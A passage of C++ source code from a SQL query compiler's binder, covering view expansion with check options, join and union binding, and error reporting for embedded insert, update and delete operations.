Since the view has already been expanded we reset the viewExpansion flag here. //if (overrideSchemaEnabled()) bindWA->getCurrentScope()->setInViewExpansion(inViewExpansion); // ************ THE SECOND OF TWO BINDNODE'S ************ // Bind the view tree whose top is this new RenameTable. // If we are the topmost WCO, then do NOT cascade the incoming predicate! // Collect usages only if CatMan caller requested it. // if (topmostViewWithCheckOption) bindWA->inViewWithCheckOption() = NULL; if (!catmanCollectUsages) bindWA->setNameLocListPtr(NULL); queryTree = queryTree->bindNode(bindWA); bindWA->setNameLocListPtr(saveNameLocList); if (bindWA->errStatus()) return NULL; ((RenameTable *) queryTree)->setViewNATable(NULL); // Genesis 10-980126-5495: // Now that we have the RenameTable's RETDesc, set its view column headings. // We know that the NATable and the RenameTable column lists are in lockstep. // const ColumnDescList &columnsRET = *queryTree->getRETDesc()->getColumnList(); CMPASSERT(columns.entries() == naTable->getColumnCount() && columns.entries() == columnsRET.entries()); for (i = 0; i < naTable->getColumnCount(); i++) { columnsRET[i]->setHeading(columns[i]->getHeading()); } // If it's a view that is WITH CHECK OPTION, and this is an UPDATE/INSERT, // bind/transform/normalize the view predicate and place it as a constraint // on the base table's TableDesc. This is equivalent to the default kind // of check clause, WITH CASCADED CHECK OPTION, which is all we need provide // up through Intermediate-Level SQL'92. // // (ANSI says that all CHECK OPTION views must be updatable (11.19 SR12) // which means it references exactly one updatable view or, at bottom, // exactly one base table (7.9 SR12). // MP guarantees that all CHECK OPTION views must be protection views, and // all pviews reference exactly one base table.) // // Notice that since (Genesis 10-990518-8420) we now bind and collect the // view preds in bindSelf -- i.e. pushed down below here -- // only this topmost WCO can set up the constraint(s). // Thus we have lost the nice, but not mandated by Ansi, ability to specify // which cascaded-down-to view causes which exact pred violation -- // i.e. error EXE_CHECK_OPTION_VIOLATION_CASCADED (8104) // no longer appears, only EXE_CHECK_OPTION_VIOLATION (8105). if (topmostViewWithCheckOption) { CheckConstraint *constraint = NULL; ItemExpr *viewCheckPred = NULL; if (bindWA->predsOfViewWithCheckOption().entries()) { constraint = new (bindWA->wHeap()) CheckConstraint(viewName.getQualifiedNameObj(), // this view name naTable->getTableName(), // no parsing needed bindWA->wHeap()); viewCheckPred = bindWA->predsOfViewWithCheckOption().rebuildExprTree(); } // if at least one predicate exists in the view or what underlies it if (constraint) { RelExpr *underlyingTableOrView = viewRoot->child(0); RETDesc *saveRETDesc = bindWA->getCurrentScope()->getRETDesc(); RETDesc *underlyingRETDesc = underlyingTableOrView->getRETDesc(); bindWA->getCurrentScope()->setRETDesc(underlyingRETDesc); CMPASSERT(underlyingTableOrView); CMPASSERT(underlyingTableOrView->getOperatorType() == REL_RENAME_TABLE || underlyingTableOrView->getOperatorType() == REL_SCAN); ItemExpr *constraintPred = bindCheckConstraint(bindWA, constraint, naTable, catmanCollectUsages, viewCheckPred); if (constraintPred) queryTree->getScanNode()->getTableDesc()->addCheckConstraint( bindWA, naTable, // topmost WCO view constraint, // this view name constraintPred); bindWA->getCurrentScope()->setRETDesc(saveRETDesc); } // at least one predicate exists bindWA->inViewWithCheckOption() = NULL; bindWA->predsOfViewWithCheckOption().clear(); } // topmost WCO view // QSTUFF bindWA->setInViewExpansion(inViewExpansion); bindWA->getUpdateToScanValueIds().clear(); // QSTUFF return queryTree; } // BindWA::bindView() // ----------------------------------------------------------------------- // member functions for class RelExpr // ----------------------------------------------------------------------- void RelExpr::bindChildren(BindWA *bindWA) { // Increment the trigger recursion counter. if (getInliningInfo().isTriggerRoot()) getInliningInfo().getTriggerObject()->incRecursionCounter(); // TSJ's flow their data from left child to right child; // some can also share binding scope column info from left to right. Int32 arity = getArity(); for (Int32 i = 0; i < arity; i++) { if (child(i)) { // If doing a non-first child and the operator is // NOT one in which values/names can flow from one scope // the sibling scope, then we must clear the current RETDesc // (so as to disallow the illegal query in the Binder internals document, // section 1.5.3, also in TEST028). // if (i && !getOperator().match(REL_ANY_TSJ)) bindWA->getCurrentScope()->setRETDesc(NULL); child(i) = child(i)->bindNode(bindWA); if (bindWA->errStatus()) return; } } synthPropForBindChecks(); // QSTUFF // Decrement the trigger recursion counter. if (getInliningInfo().isTriggerRoot()) getInliningInfo().getTriggerObject()->decRecursionCounter(); } // RelExpr::bindChildren() void RelExpr::synthPropForBindChecks() // QSTUFF { // synthesis of delete and stream properties to // allow for binder checks. We assume that all // operators are rejected when binding the respective node // -- except UNIONS -- in which more than one child has // has any of those attributes. If both attributes are // specified both must be specified for the same // result-set/base table. for (Int32 j = 0; j < getArity(); j++) { if (child(j)) { if (child(j)->getGroupAttr()->isStream()) { getGroupAttr()->setStream(TRUE); if (child(j)->getGroupAttr()->isSkipInitialScan()) getGroupAttr()->setSkipInitialScan(TRUE); } if (child(j)->getGroupAttr()->isEmbeddedUpdateOrDelete() || child(j)->getGroupAttr()->isEmbeddedInsert()) getGroupAttr()->setEmbeddedIUD( child(j)->getGroupAttr()->getEmbeddedIUD()); if (child(j)->getGroupAttr()->reorderNeeded()) getGroupAttr()->setReorderNeeded(TRUE); } } } RelExpr *RelExpr::bindSelf(BindWA *bindWA) { // create the group attributes // if (NOT getGroupAttr()) setGroupAttr(new (bindWA->wHeap()) GroupAttributes); // // Detach the item expression tree for the predicate, bind it, convert it to // a ValueIdSet, and attach it to the RelExpr node. // ItemExpr *predTree = removeSelPredTree(); if (predTree) { bindWA->getCurrentScope()->context()->inWhereClause() = TRUE; predTree->convertToValueIdSet(selectionPred(), bindWA, ITM_AND); bindWA->getCurrentScope()->context()->inWhereClause() = FALSE; if (bindWA->errStatus()) return this; // If this is an embedded insert, then subquery predicates are not // allowed. // For example: To handle this query and issue an error stating // subqueries are not allowed in embedded inserts // // select a from (insert into t901t01 values(22,22,222))t(a,b,c) // where t.a IN (select m from t901t03 where t901t03.m = 77); if (getGroupAttr()->isEmbeddedInsert()) { if (!selectionPred().isEmpty() && selectionPred().containsSubquery()) { *CmpCommon::diags() << DgSqlCode(-4337); bindWA->setErrStatus(); return this; } } // Genesis 10-990518-8420. if (bindWA->inViewWithCheckOption()) bindWA->predsOfViewWithCheckOption() += selectionPred(); } // ++MV // Bind the uniqueColumnsTree expression. // ItemExpr *uniqueColumnsTree = removeUniqueColumnsTree(); if (uniqueColumnsTree) { uniqueColumnsTree-> convertToValueIdSet(getUniqueColumns(), bindWA, ITM_ITEM_LIST); if (bindWA->errStatus()) return this; } // --MV // set flag here if an Insert/Update/Delete operation is below this node if( bindWA->isBindingIUD() ) { setSeenIUD(); } // // This mechanism is used to set InliningInfo flags on an entire subtree. getInliningInfo().setFlags(bindWA->getInliningInfoFlagsToSetRecursivly()); // // Add the values in the Outer References Set as the input values // that must be supplied to this RelExpr. // getGroupAttr()->addCharacteristicInputs(bindWA->getCurrentScope()->getOuterRefs()); markAsBound(); return this; } // RelExpr::bindSelf() RelExpr *RelExpr::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } bindChildren(bindWA); if (bindWA->errStatus()) return this; return bindSelf(bindWA); } RETDesc *RelExpr::getRETDesc() const { if (RETDesc_) return RETDesc_; if (getArity() == 1) return child(0)->getRETDesc(); else return NULL; } // When there is a view atop a view atop a ... atop a single base table, // this will follow the chain of RenameTable-RelRoot-... down till it finds // the bottom, the single base table's Scan node. // // This method does check to ensure exactly one single base table. // Scan *RelExpr::getScanNode(NABoolean assertExactlyOneScanNode) const { RelExpr *result = (RelExpr *)this; // cast away constness, big whoop while (result) { if ((result->getOperatorType() == REL_SCAN) || (result->getOperatorType() == REL_HBASE_ACCESS)) break; if (result->getArity() > 1) { if (assertExactlyOneScanNode) { CMPASSERT(result->getArity() <= 1); } else return NULL; } result = result->child(0); } if (assertExactlyOneScanNode) { CMPASSERT(result); } return (Scan *)result; } Scan *RelExpr::getLeftmostScanNode() const { RelExpr *result = (RelExpr *)this; // cast away constness, big whoop while (result) { if (result->getOperatorType() == REL_SCAN) break; result = result->child(0); } return (Scan *)result; } // QSTUFF // We use this method for finding the scan node of an updatable view. // This may either be a base table scan or a RenameTable node inserted // by a previous index expansion. RelExpr *RelExpr::getViewScanNode(NABoolean isTopLevelUpdateInView) const { RelExpr *result = (RelExpr *)this; // cast away constness, big whoop while (result) { if (result->getOperatorType() == REL_SCAN) break; if (result->getOperatorType() == REL_RENAME_TABLE && ((RenameTable *)result)->isView()) break; result = result->child(0); } return result; } // ----------------------------------------------------------------------- // getFirstIUDNode // // Return the first node that is an insert, update, or delete. // Only search down left side from the starting point (currentNode) // // If an IUD node is not found, return NULL // ----------------------------------------------------------------------- GenericUpdate * Join::getFirstIUDNode(RelExpr *currentNode) { while(currentNode) { if( currentNode->getOperator().match(REL_ANY_GEN_UPDATE)) { break; } currentNode = currentNode->child(0); } return (GenericUpdate*)currentNode; } // ----------------------------------------------------------------------- // member functions for class Join // // When we implement "JOIN USING (column list)", we need to: ## // - disallow both NATURAL and USING in the same query (syntax err in Parser?) // - ensure that the named USING cols are indeed common cols // - coalesce common cols for USING just as we do for NATURAL, // including ensuring that common cols are marked as referenced // (as done in joinCommonColumns) // ----------------------------------------------------------------------- RelExpr *Join::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // Do not support for general NEO users. if ( (getOperatorType() == REL_FULL_JOIN) && (CmpCommon::getDefault(COMP_BOOL_192) == DF_ON) ) { RelExpr *leftJoin = this; leftJoin->setOperatorType(REL_LEFT_JOIN); RelExpr *antiJoin = leftJoin->copyTree(bindWA->wHeap()); antiJoin->setOperatorType(REL_RIGHT_JOIN); NAString leftName("ALJ", bindWA->wHeap()); // Make it unique. // leftName += bindWA->fabricateUniqueName(); RelExpr *rename = new (bindWA->wHeap()) RenameTable(antiJoin, leftName); RelExpr *unionAll = new (bindWA->wHeap()) Union(leftJoin, rename); unionAll->bindNode(bindWA); if (bindWA->errStatus()) return this; // Make sure there is at least one null instantiated // value that is suitable for use as a filter. // To be suitable, it must be null instantiated and // it's child must not be nullable. We want to filter // the NULL that are a result of null instantiation, not // original null values. // ItemExpr *cval = new (bindWA->wHeap()) SystemLiteral(1); cval->bindNode(bindWA); if (bindWA->errStatus()) return this; // Null instantiate the value. // ValueId niCval = cval->getValueId().nullInstantiate(bindWA, TRUE); // Add it to the RETDesc of the Join. // ColRefName cvalName("", bindWA->wHeap()); antiJoin->getRETDesc()->addColumn(bindWA, cvalName , niCval, USER_COLUMN); // Add it to the list of null instantiated outputs. // ((Join *)antiJoin)->nullInstantiatedOutput().insert(niCval); ItemExpr *nullCheck = niCval.getItemExpr(); CMPASSERT(nullCheck); ItemExpr *filter = new (bindWA->wHeap()) UnLogic(ITM_IS_NULL, nullCheck ); filter->bindNode(bindWA); if (bindWA->errStatus()) return this; // Add filter to Join // antiJoin->selectionPred() += filter->getValueId(); return unionAll; } Join *saveInJ = bindWA->getCurrentScope()->context()->inJoin(); bindWA->getCurrentScope()->context()->inJoin() = this; NABoolean savedPrivSetting = FALSE; // Bind the child nodes. // bindChildren(bindWA); if (bindWA->errStatus()) return this; // MV logging push-down if( getInliningInfo().isDrivingMvLogInsert() ) { GenericUpdate *rightSideIUD = getFirstIUDNode(this->child(1)); if( NULL != rightSideIUD ) { TableDesc *tdesc = rightSideIUD->getTableDesc(); CMPASSERT(tdesc); const NATable *table = tdesc->getNATable(); // only for MV logs if( ExtendedQualName::IUD_LOG_TABLE == table->getSpecialType() ) { updateTableDesc_ = tdesc; updateSelectValueIdMap_ = new (bindWA->wHeap()) ValueIdMap(rightSideIUD->updateToSelectMap()); } } } // Controlled availability of Full Outer Join support // The COMP_BOOL_199 must be removed when full outer join // becomes general availability. // Full outer joins are not currently supported. // But can enabled by setting COMP_BOOL_199 to ON. if ((getOperatorType() == REL_FULL_JOIN && (CmpCommon::getDefault(COMP_BOOL_199) == DF_OFF)) || //OR (getOperatorType() == REL_UNION_JOIN )){ // 3022 Feature not yet supported *CmpCommon::diags() << DgSqlCode(-3022) << DgString0( (getOperatorType() == REL_FULL_JOIN) ? "FULL OUTER JOIN" : "UNION JOIN"); bindWA->setErrStatus(); return this; } // // Bind the ON clause of the join. // RelExpr *leftRelExpr = child(0).getPtr(); RelExpr *rightRelExpr = child(1).getPtr(); RETDesc *leftTable = child(0)->getRETDesc(); RETDesc *rightTable = child(1)->getRETDesc(); ItemExpr *joinPredx; if (isNaturalJoin()) { // since the common column references need fetch histograms, the where // flag is set here so that when we call markAsReferencedColumn() // in the joinCommoncolumns() method it would set the common // columns as refenced by looking a the inWhereCaluse_ flag. NABoolean orig = bindWA->getCurrentScope()->context()->inWhereClause(); bindWA->getCurrentScope()->context()->inWhereClause() = TRUE; joinPredx = joinCommonColumns(leftRelExpr, rightRelExpr, bindWA); bindWA->getCurrentScope()->context()->inWhereClause() = orig; } else joinPredx = removeJoinPredTree(); if (joinPredx) { ItemExpr *saveInJP = bindWA->getCurrentScope()->context()->inJoinPred(); bindWA->getCurrentScope()->context()->inJoinPred() = joinPredx; RETDesc preJoinResult; preJoinResult.addColumns(bindWA, *leftTable); preJoinResult.addColumns(bindWA, *rightTable); bindWA->getCurrentScope()->setRETDesc(&preJoinResult); joinPredx->convertToValueIdSet(joinPred(), bindWA, ITM_AND); bindWA->getCurrentScope()->context()->inJoinPred() = saveInJP; if (bindWA->errStatus()) return this; } // // Create the output list. // The TRUE's in the nullInstantiate() force a Cast expression to be set up, // as required by the Normalizer. // NABoolean newTables = TRUE; ValueIdList &nullOutputList = nullInstantiatedOutput(); ValueIdList &nullOutputForRightJoinList = nullInstantiatedForRightJoinOutput(); switch(getOperatorType()) { case REL_LEFT_JOIN: leftTable = new (bindWA->wHeap()) RETDesc(bindWA, *leftTable); rightTable = rightTable->nullInstantiate(bindWA, TRUE, nullOutputList); break; case REL_RIGHT_JOIN: leftTable = leftTable->nullInstantiate(bindWA, TRUE, nullOutputList); rightTable = new (bindWA->wHeap()) RETDesc(bindWA, *rightTable); break; case REL_FULL_JOIN: case REL_UNION_JOIN: { leftTable = leftTable->nullInstantiate(bindWA, TRUE, nullOutputForRightJoinList); rightTable = rightTable->nullInstantiate(bindWA, TRUE, nullOutputList); // comp_bool_198 = 'on' enables FullOuter transformation // inner, left or right if (CmpCommon::getDefault(COMP_BOOL_198) == DF_OFF) //don't enable FOJ transformation { ItemExpr * instNull = NULL; CollIndex index = 0; // disable the FOJ Transformation. for (index = 0; index < nullInstantiatedOutput().entries(); index++) { instNull = nullInstantiatedOutput()[index].getItemExpr(); CMPASSERT(instNull->getOperatorType() == ITM_INSTANTIATE_NULL); ((InstantiateNull *)instNull)->NoCheckforLeftToInnerJoin = TRUE; } // endfor instNull = NULL; for (index = 0; index < nullInstantiatedForRightJoinOutput().entries(); index++) { instNull = nullInstantiatedForRightJoinOutput()[index].getItemExpr(); CMPASSERT(instNull->getOperatorType() == ITM_INSTANTIATE_NULL); ((InstantiateNull *)instNull)->NoCheckforLeftToInnerJoin = TRUE; } // endfor } // env "ENABLE_FOJ_TRANSFORMATION" break; } case REL_JOIN: default: newTables = FALSE; break; } RETDesc *resultTable = new (bindWA->wHeap()) RETDesc(bindWA); Int32 rowSet = (child(0)->getOperatorType() == REL_RENAME_TABLE) && (child(0)->child(0)->getOperatorType() == REL_UNPACKROWS) && (child(1)->getOperatorType() == REL_ROOT); if (NOT isNaturalJoin()) { if ((!rowSet) && (getOperatorType() != REL_TSJ_FLOW)) { resultTable->addColumns(bindWA, *leftTable); } // ++MV -- bug fixing for semi-joins if (!isSemiJoin()) { resultTable->addColumns(bindWA, *rightTable); } // --MV -- bug fixing for semi-joins } else { coalesceCommonColumns(bindWA, getOperatorType(), *leftTable, *rightTable, *resultTable); if (bindWA->errStatus()) return this; } setRETDesc(resultTable); bindWA->getCurrentScope()->setRETDesc(resultTable); // QSTUFF NAString fmtdList(bindWA->wHeap()); LIST(TableNameMap*) xtnmList(bindWA->wHeap()); bindWA->getTablesInScope(xtnmList, &fmtdList); if ((child(0)->getGroupAttr()->isStream()) && (child(1)->getGroupAttr()->isStream())){ bindWA->getTablesInScope(xtnmList, &fmtdList); *CmpCommon::diags() << DgSqlCode(-4158) << DgString0(fmtdList); bindWA->setErrStatus(); return this; } // Disallowing joins for EMBEDDED...INSERT // if (getGroupAttr()->isEmbeddedInsert() && !isTSJForWrite() // the tsjForWrite flag is set for // those joins which are created by // the Binder during inlining (eg. IndexMaintanence) // Here we only want to disable user specified joins // and not joins introduced as part of inlining. ){ *CmpCommon::diags() << DgSqlCode(-4336) << DgString0(fmtdList) << DgString1(getGroupAttr()->getOperationWithinGroup()); bindWA->setErrStatus(); return this; } if ( ((child(0)->getGroupAttr()->isEmbeddedUpdateOrDelete()) && (child(1)->getGroupAttr()->isEmbeddedUpdateOrDelete())) || ((child(0)->getGroupAttr()->isEmbeddedInsert()) && (child(1)->getGroupAttr()->isEmbeddedInsert())) || (bindWA->isEmbeddedIUDStatement()) ) { NAString type0,type1; if (child(0)->getGroupAttr()->isEmbeddedUpdate()) type0 = "UPDATE"; else { if (child(0)->getGroupAttr()->isEmbeddedInsert()) type0 = "INSERT"; else type0 = "DELETE"; } if (child(1)->getGroupAttr()->isEmbeddedUpdate()) type1 = "UPDATE"; else { if (child(1)->getGroupAttr()->isEmbeddedInsert()) type1 = "INSERT"; else type1 = "DELETE"; } *CmpCommon::diags() << DgSqlCode(-4175) << DgString0(fmtdList) << DgString1(type0) << DgString2(type1); bindWA->setErrStatus(); return this; } if ((child(0)->getGroupAttr()->isEmbeddedUpdateOrDelete() || child(0)->getGroupAttr()->isStream()) && (child(1)->getGroupAttr()->isEmbeddedUpdateOrDelete() || child(1)->getGroupAttr()->isStream())){ *CmpCommon::diags() << DgSqlCode(-4176) << DgString0(fmtdList) << (getGroupAttr()->isEmbeddedUpdate() ? DgString1("UPDATE"):DgString1("DELETE")); bindWA->setErrStatus(); return this; } if (getOperatorType() == REL_LEFT_JOIN){ if (child(1)->getGroupAttr()->isEmbeddedUpdateOrDelete()){ *CmpCommon::diags() << DgSqlCode(-4156) << DgString0(fmtdList) << (child(1)->getGroupAttr()->isEmbeddedUpdate() ? DgString1("UPDATE"):DgString1("DELETE")); bindWA->setErrStatus(); return this; } if (child(1)->getGroupAttr()->isStream()){ *CmpCommon::diags() << DgSqlCode(-4157) << DgString0(fmtdList); bindWA->setErrStatus(); return this; } } if (getOperatorType() == REL_RIGHT_JOIN){ if (child(0)->getGroupAttr()->isEmbeddedUpdateOrDelete()){ *CmpCommon::diags() << DgSqlCode(-4164) << DgString0(fmtdList) << (child(0)->getGroupAttr()->isEmbeddedUpdate() ? DgString1("UPDATE"):DgString1("DELETE")); bindWA->setErrStatus(); return this; } if (child(0)->getGroupAttr()->isStream()){ *CmpCommon::diags() << DgSqlCode(-4165) << DgString0(fmtdList); bindWA->setErrStatus(); return this; } } // we need to move stream and nested updates to the // left to ensure correct execution. This causes the statement // to be rejected if the user specified join_order_by_user and // the query must be reordered if (child(1)->getGroupAttr()->isStream() || child(1)->getGroupAttr()->isEmbeddedUpdateOrDelete()){ getGroupAttr()->setReorderNeeded(TRUE); } // QSTUFF if (newTables) { delete leftTable; delete rightTable; } bindWA->getCurrentScope()->context()->inJoin() = saveInJ; if (getOperatorType() == REL_TSJ){ //Using rowsets in a predicate with embedded update/delete results //in a NestedJoin subtree after Normalization.This NestedJoin subtree //has embedded update/delete as the right child, which is not allowed //during optimization. Here we try to disallow this usage at Binding //when a REL_TSJ subtree has rowsets as the left child and embedded //update/delete as the right child. An error message[4123] is signaled. if (rowSet && getGroupAttr()->isEmbeddedUpdateOrDelete()){ *CmpCommon::diags() << DgSqlCode(-4213); bindWA->setErrStatus(); return this; } } // transfer rowsetRowCountArraySize from HostArrayWA to this node. if (bindWA->getHostArraysArea() && isRowsetIterator()) setRowsetRowCountArraySize(bindWA->getHostArraysArea()->getRowsetRowCountArraySize()); // Bind the base class. // return bindSelf(bindWA); } // Join::bindNode() //++MV // This function builds the BalueIdMap that is used for translating the required // sort key to the right child sort key and backwards void Join::BuildRightChildMapForLeftJoin() { ValueIdMap &map = rightChildMapForLeftJoin(); for (CollIndex j = 0; j < nullInstantiatedOutput().entries(); j++) { ValueId instNullId, rightChildId; instNullId = nullInstantiatedOutput_[j]; assert(instNullId.getItemExpr()->getOperatorType() == ITM_INSTANTIATE_NULL); // Access the operand of the InstantiateNull rightChildId = (((InstantiateNull *)(instNullId.getItemExpr()))->getExpr()->getValueId()); map.addMapEntry(instNullId, rightChildId); } } //--MV //++MV // This function builds the ValueIdMap that is used for translating the // required // sort key to the left child sort key and backwards void Join::BuildLeftChildMapForRightJoin() { ValueIdMap &map = leftChildMapForRightJoin(); for (CollIndex j = 0; j < nullInstantiatedForRightJoinOutput().entries(); j++) { ValueId instNullId, leftChildId; instNullId = nullInstantiatedForRightJoinOutput_[j]; assert(instNullId.getItemExpr()->getOperatorType() == ITM_INSTANTIATE_NULL); // Access the operand of the InstantiateNull leftChildId = (((InstantiateNull *)(instNullId.getItemExpr()))->getExpr()->getValueId()); map.addMapEntry(instNullId, leftChildId); } } //--MV // ----------------------------------------------------------------------- // member functions for class Intersect // ----------------------------------------------------------------------- // LCOV_EXCL_START - cnu RelExpr *Intersect::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // Bind the child nodes. // bindChildren(bindWA); if (bindWA->errStatus()) return this; // Check that there are an equal number of select items on both sides. // const RETDesc &leftTable = *child(0)->getRETDesc(); const RETDesc &rightTable = *child(1)->getRETDesc(); if (leftTable.getDegree() != rightTable.getDegree()) { // 4014 The operands of an intersect must be of equal degree. *CmpCommon::diags() << DgSqlCode(-4014); bindWA->setErrStatus(); return this; } // Join the columns of both sides. This is wrong semantics tho! ## // *CmpCommon::diags() << DgSqlCode(-3022) // ## INTERSECT not yet supported << DgString0("INTERSECT"); // ## bindWA->setErrStatus(); // ## if (bindWA->errStatus()) return NULL; // ## // ItemExpr *predicate = intersectColumns(leftTable, rightTable, bindWA); RelExpr *join = new (bindWA->wHeap()) Join(child(0)->castToRelExpr(), child(1)->castToRelExpr(), REL_JOIN, predicate); // Bind the join. // join = join->bindNode(bindWA)->castToRelExpr(); if (bindWA->errStatus()) return join; // Change the output of the join to just the left side. // delete join->getRETDesc(); join->setRETDesc(new (bindWA->wHeap()) RETDesc(bindWA, leftTable)); bindWA->getCurrentScope()->setRETDesc(join->getRETDesc()); // QSTUFF NAString fmtdList1(bindWA->wHeap()); LIST(TableNameMap*) xtnmList1(bindWA->wHeap()); NAString fmtdList2(bindWA->wHeap()); LIST(TableNameMap*) xtnmList2(bindWA->wHeap()); leftTable.getTableList(xtnmList1, &fmtdList1); rightTable.getTableList(xtnmList2, &fmtdList2); if (child(0)->getGroupAttr()->isStream() && child(1)->getGroupAttr()->isStream()){ *CmpCommon::diags() << DgSqlCode(-4159) << DgString0(fmtdList1) << DgString1(fmtdList2); bindWA->setErrStatus(); return this; } // Needs to be removed when supporting get_next for INTERSECT if (getGroupAttr()->isEmbeddedUpdateOrDelete()) { *CmpCommon::diags() << DgSqlCode(-4160) << DgString0(fmtdList1) << DgString1(fmtdList2) << (child(0)->getGroupAttr()->isEmbeddedUpdate() ? DgString2("UPDATE"):DgString2("DELETE")) << (child(1)->getGroupAttr()->isEmbeddedUpdate() ? DgString3("UPDATE"):DgString3("DELETE")); bindWA->setErrStatus(); return this; } // QSTUFF return join; } // Intersect::bindNode() // LCOV_EXCL_STOP // ----------------------------------------------------------------------- // member functions for class Union // ----------------------------------------------------------------------- RelExpr *Union::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // // Bind the conditional expression. // ItemExpr *condExprTree = removeCondExprTree(); if (condExprTree) { condExprTree->convertToValueIdList(condExpr(), bindWA, ITM_ITEM_LIST); if (bindWA->errStatus()) { return NULL; } } // // Bind the triggered action exception expression. // ItemExpr *trigExprTree = removeTrigExceptExprTree(); if (trigExprTree) { // the assumption in the binder (in Union::addValueIdUnion) is that // unionMap_ count is always less than or equal to one but triggers // code might increment this number during binding because of // recursive triggers or triggers that are used more than once // in the statement. This check fixes the unionMap_ for triggers. if ((unionMap_ != NULL) && (unionMap_->count_ > 1)) { unionMap_->count_--; unionMap_ = new (CmpCommon::statementHeap()) UnionMap; } trigExprTree->convertToValueIdList(trigExceptExpr(), bindWA, ITM_ITEM_LIST); if (bindWA->errStatus()) { return NULL; } } AssignmentStArea *assignArea = NULL; // We store a pointer to this Union node in the assignment statements area. // This is needed for compound statements project, in particular when we have // assignment statements within an IF statement if (getUnionForIF()) { assignArea = bindWA->getAssignmentStArea(); setPreviousIF(assignArea->getCurrentIF()); assignArea->setCurrentIF(this); } // // Bind the child nodes. // bindWA->getCurrentScope()->context()->inUnion() = TRUE; currentChild() = 0; child(0) = child(0)->bindNode(bindWA); if (bindWA->errStatus()) return this; // If we have assignment statements of compound statements, we need to get rid // of the value ids generated while binding the first child. Also, we create a // list of the value ids of the variables that are on the left side of a SET // statement if (getUnionForIF() && leftList() && assignArea) { assignArea->removeLastValueIds(leftList(), this); } if (getCondUnary()) { CollIndex leftDegree = child(0)->getRETDesc()->getDegree(); ItemExpr *tupleExpr = new (bindWA->wHeap()) ConstValue(); for (CollIndex i=0; i+1<leftDegree; i++) { ItemExpr *con = new (bindWA->wHeap()) ConstValue(); ItemList *list = new (bindWA->wHeap()) ItemList(con, tupleExpr); tupleExpr = list; } RelExpr *tuple = new (bindWA->wHeap()) Tuple(tupleExpr); // create the selection predicate (1=0) for the Tuple node ItemExpr *predicate = new (bindWA->wHeap()) BiRelat(ITM_EQUAL, new (bindWA->wHeap()) ConstValue(1), new (bindWA->wHeap()) ConstValue(0)); tuple->addSelPredTree(predicate); RelExpr *tupleRoot = new (bindWA->wHeap()) RelRoot(tuple); setChild (1, tupleRoot); } if (child(1)) { if (!(child(1)->getOperator().match(REL_ANY_TSJ))) { bindWA->getCurrentScope()->setRETDesc(NULL); } currentChild() = 1; child(1) = child(1)->bindNode(bindWA); if (bindWA->errStatus()) return this; // If we have assignment statements of compound statements, // we need to get rid of the value ids generated while binding // the second child if (getUnionForIF() && rightList() && assignArea) { assignArea->removeLastValueIds(rightList(), this); } } // check for & warn against UNIONs that have inconsistent access/lock modes. // flag "select * from t1 union select * from t2 for <access> mode" // with a warning that t1 and t2 may have inconsistent access/lock modes. checkAccessLockModes(); //Copies the leftlist and rightlist this conditional union to the appropriate list of the //conditional union node pointed to by the previousIF argument. Union * previousIF = getPreviousIF(); if (previousIF && getUnionForIF()) { copyLeftRightListsToPreviousIF(previousIF, bindWA); } synthPropForBindChecks(); // QSTUFF bindWA->getCurrentScope()->context()->inUnion() = FALSE; // // Check that there are an equal number of select items on both sides. // const RETDesc &leftTable = *child(0)->getRETDesc(); const RETDesc &rightTable = *child(1)->getRETDesc(); RETDesc *resultTable = NULL; RelRoot * root = bindWA->getTopRoot() ; if (root) { if (getGroupAttr()->isStream() && root->hasOrderBy()){ NAString fmtdList1(bindWA->wHeap()); LIST(TableNameMap*) xtnmList1(bindWA->wHeap()); NAString fmtdList2(bindWA->wHeap()); LIST(TableNameMap*) xtnmList2(bindWA->wHeap()); leftTable.getTableList(xtnmList1, &fmtdList1); rightTable.getTableList(xtnmList2, &fmtdList2); *CmpCommon::diags() << DgSqlCode(-4166) << DgString0(fmtdList1) << DgString1(fmtdList2) ; bindWA->setErrStatus(); return this; } } if (leftTable.getDegree() != rightTable.getDegree()) { #ifndef NDEBUG dumpChildrensRETDescs(leftTable, rightTable); #endif if ( (!getUnionForIF()) && (!getCondUnary()) //for triggers ) { // 4126 The row-value-ctors of a VALUES must be of equal degree. // 4066 The operands of a union must be of equal degree. // This is not necessary if we are in an assignment stmt. Lng32 sqlcode = bindWA->getCurrentScope()->context()->inTupleList() ? -4126 : -4066; *CmpCommon::diags() << DgSqlCode(sqlcode); bindWA->setErrStatus(); return this; } } // // For each select item on both sides, create a ValueIdUnion and insert its // ValueId into the select list for the union. // // We check to see if there were assignments on either side if ( !getUnionForIF() ) { resultTable = new (bindWA->wHeap()) RETDesc(bindWA); for (CollIndex i = 0; i < leftTable.getDegree(); i++) { ValueIdUnion *vidUnion = new (bindWA->wHeap()) ValueIdUnion(leftTable.getValueId(i), rightTable.getValueId(i), NULL_VALUE_ID, #pragma nowarn(1506) // warning elimination getUnionFlags()); #pragma warn(1506) // warning elimination vidUnion->setIsTrueUnion(TRUE); vidUnion->bindNode(bindWA); if (bindWA->errStatus()) { delete vidUnion; delete resultTable; return this; } ValueId valId = vidUnion->getValueId(); addValueIdUnion(valId, bindWA->wHeap()); resultTable->addColumn(bindWA, leftTable.getColRefNameObj(i), valId); } } else { // Case in which we have asignment statements below this node. // We have to carefuly match the valueids in the IF and ELSE part. // For instance, if SET :a = ... occurs in both branches or only in one. if (getUnionForIF() && assignArea) { resultTable = createReturnTable(assignArea, bindWA); } } setRETDesc(resultTable); bindWA->getCurrentScope()->setRETDesc(resultTable); // // Bind the base class. // // We are done binding this node. The current IF node is now the closest // IF node that is also an ancestor of this node if (getUnionForIF() && assignArea) { assignArea->setCurrentIF(getPreviousIF()); } // QSTUFF // this is not a hard restriction. Once the get_next protocol supports unions // similar to the split-top operator, this check can be removed. if (getGroupAttr()->isEmbeddedUpdateOrDelete() || (getGroupAttr()->isEmbeddedInsert() && !isSystemGenerated_) || (bindWA->isEmbeddedIUDStatement())) { if (getUnionForIF()) { *CmpCommon::diags() << DgSqlCode(-4210); bindWA->setErrStatus(); return this; } NAString fmtdList1(bindWA->wHeap()); LIST(TableNameMap*) xtnmList1(bindWA->wHeap()); NAString fmtdList2(bindWA->wHeap()); LIST(TableNameMap*) 